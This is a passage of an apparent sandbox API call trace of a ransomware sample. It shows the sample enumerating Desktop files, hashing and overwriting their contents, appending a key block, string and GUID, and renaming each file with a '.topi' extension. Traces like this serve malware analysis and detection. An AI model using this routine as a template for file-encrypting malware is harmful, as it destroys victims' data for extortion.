hHeap=0x680000) returned 1 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.757] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xfD1AXfX.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xfd1axfx.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xfD1AXfX.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xfd1axfx.mp4.topi")) returned 1 [0094.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.758] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.758] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.760] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d5189f0, ftCreationTime.dwHighDateTime=0x1d5bb1d, ftLastAccessTime.dwLowDateTime=0xc5c3e3c0, ftLastAccessTime.dwHighDateTime=0x1d5c5cb, ftLastWriteTime.dwLowDateTime=0xc5c3e3c0, ftLastWriteTime.dwHighDateTime=0x1d5c5cb, nFileSizeHigh=0x0, nFileSizeLow=0xd706, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YhmCkoT6ZnchGJfJ-Z.odt", cAlternateFileName="YHMCKO~1.ODT")) returned 1 [0094.760] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YhmCkoT6ZnchGJfJ-Z.odt") returned=".odt" [0094.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YhmCkoT6ZnchGJfJ-Z.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yhmckot6znchgjfj-z.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.760] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=55046) returned 1 [0094.760] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.763] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd6e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.763] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.765] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.766] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.766] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.766] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.766] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.766] GetLastError () returned 0x0 [0094.766] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.766] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.766] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.766] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.766] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.766] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd710) returned 0x99f52d8 [0094.767] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3ec8 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9180 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3f10 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91e0 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.767] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.767] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d91e0 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d91c8 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.768] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.768] GetCurrentThreadId () returned 0x8c4 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e21b0 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.768] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.769] GetCurrentThreadId () returned 0x8c4 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.769] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91e0 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91b0 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d91f8 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91f8 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9198 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3f10 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.772] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0xd701, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0xd701, lpOverlapped=0x0) returned 1 [0094.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.773] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd706, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.773] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.773] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.773] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.773] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.774] CloseHandle (hObject=0x6a8) returned 1 [0094.781] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.781] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.781] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.781] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YhmCkoT6ZnchGJfJ-Z.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yhmckot6znchgjfj-z.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YhmCkoT6ZnchGJfJ-Z.odt.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yhmckot6znchgjfj-z.odt.topi")) returned 1 [0094.782] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.782] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.782] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.783] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | 